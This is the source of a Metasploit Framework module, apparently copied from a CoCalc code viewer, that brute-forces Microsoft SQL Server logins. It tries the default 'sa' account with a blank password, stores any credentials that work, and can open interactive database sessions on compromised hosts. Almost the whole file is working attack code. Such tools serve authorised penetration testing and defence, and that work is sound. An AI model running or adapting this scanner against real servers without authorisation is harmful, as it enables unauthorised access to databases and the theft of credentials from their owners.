CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/mssql/mssql_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/credential_collection'6require 'metasploit/framework/login_scanner/mssql'7require 'rex/proto/mssql/client'8require 'rex/post/mssql'910class MetasploitModule < Msf::Auxiliary11include Msf::Exploit::Remote::MSSQL12include Msf::Auxiliary::Report13include Msf::Auxiliary::AuthBrute14include Msf::Auxiliary::CommandShell15include Msf::Auxiliary::Scanner16include Msf::Sessions::CreateSessionOptions17include Msf::Auxiliary::ReportSummary1819def initialize20super(21'Name' => 'MSSQL Login Utility',22'Description' => 'This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).',23'Author' => 'MC',24'References' =>25[26[ 'CVE', '1999-0506'] # Weak password27],28'License' => MSF_LICENSE,29# some overrides from authbrute since there is a default username and a blank password30'DefaultOptions' =>31{32'USERNAME' => 'sa',33'BLANK_PASSWORDS' => true,34'CreateSession' => false35}36)37register_options([38Opt::Proxies,39OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]),40OptBool.new('CreateSession', [false, 'Create a new session for every successful login', false])41])4243if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)44add_info('New in Metasploit 6.4 - The %grnCreateSession%clr option within this module can open an interactive session')45else46options_to_deregister = %w[CreateSession]47end48deregister_options(*options_to_deregister)49end5051def create_session?52if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)53datastore['CreateSession']54else55false56end57end5859def run60results = super61logins = results.flat_map { |_k, v| v[:successful_logins] }62sessions = results.flat_map { |_k, v| v[:successful_sessions] }63print_status("Bruteforce completed, #{logins.size} #{logins.size == 1 ? 'credential was' : 'credentials were'} successful.")64return results unless framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)6566if create_session?67print_status("#{sessions.size} MSSQL #{sessions.size == 1 ? 'session was' : 'sessions were'} opened successfully.")68else69print_status('You can open an MSSQL session with these credentials and %grnCreateSession%clr set to true')70end71results72end7374def run_host(ip)75print_status("#{rhost}:#{rport} - MSSQL - Starting authentication scanner.")7677if datastore['TDSENCRYPTION']78if create_session?79raise Msf::OptionValidateError.new(80{81'TDSENCRYPTION' => "Cannot create sessions when encryption is enabled. See https://github.com/rapid7/metasploit-framework/issues/18745 to vote for this feature"82}83)84else85print_status("TDS Encryption enabled")86end87end8889cred_collection = build_credential_collection(90realm: datastore['DOMAIN'],91username: datastore['USERNAME'],92password: datastore['PASSWORD']93)9495scanner = Metasploit::Framework::LoginScanner::MSSQL.new(96configure_login_scanner(97host: ip,98port: rport,99proxies: datastore['PROXIES'],100cred_details: cred_collection,101stop_on_success: datastore['STOP_ON_SUCCESS'],102bruteforce_speed: datastore['BRUTEFORCE_SPEED'],103connection_timeout: 30,104max_send_size: datastore['TCP::max_send_size'],105send_delay: datastore['TCP::send_delay'],106auth: datastore['Mssql::Auth'],107domain_controller_rhost: datastore['DomainControllerRhost'],108hostname: datastore['Mssql::Rhostname'],109windows_authentication: datastore['USE_WINDOWS_AUTHENT'],110tdsencryption: datastore['TDSENCRYPTION'],111framework: framework,112framework_module: self,113use_client_as_proof: create_session?,114ssl: datastore['SSL'],115ssl_version: datastore['SSLVersion'],116ssl_verify_mode: datastore['SSLVerifyMode'],117ssl_cipher: datastore['SSLCipher'],118local_port: datastore['CPORT'],119local_host: datastore['CHOST']120)121)122successful_logins = []123successful_sessions = []124scanner.scan! do |result|125credential_data = result.to_h126credential_data.merge!(127module_fullname: self.fullname,128workspace_id: myworkspace_id129)130if result.success?131credential_core = create_credential(credential_data)132credential_data[:core] = credential_core133create_credential_login(credential_data)134print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"135successful_logins << result136137if create_session?138begin139successful_sessions << session_setup(result)140rescue ::StandardError => e141elog('Failed to setup the session', error: e)142print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"143result.connection.close unless result.connection.nil?144end145end146else147invalidate_login(credential_data)148vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"149end150end151{ successful_logins: successful_logins, successful_sessions: successful_sessions }152end153154# @param [Metasploit::Framework::LoginScanner::Result] result155# @return [Msf::Sessions::MSSQL]156def session_setup(result)157return unless (result.connection && result.proof)158159my_session = Msf::Sessions::MSSQL.new(result.connection, { client: result.proof, **result.proof.detect_platform_and_arch })160merge_me = {161'USERPASS_FILE' => nil,162'USER_FILE' => nil,163'PASS_FILE' => nil,164'USERNAME' => result.credential.public,165'PASSWORD' => result.credential.private166}167168start_session(self, nil, merge_me, false, my_session.rstream, my_session)169end170end171172173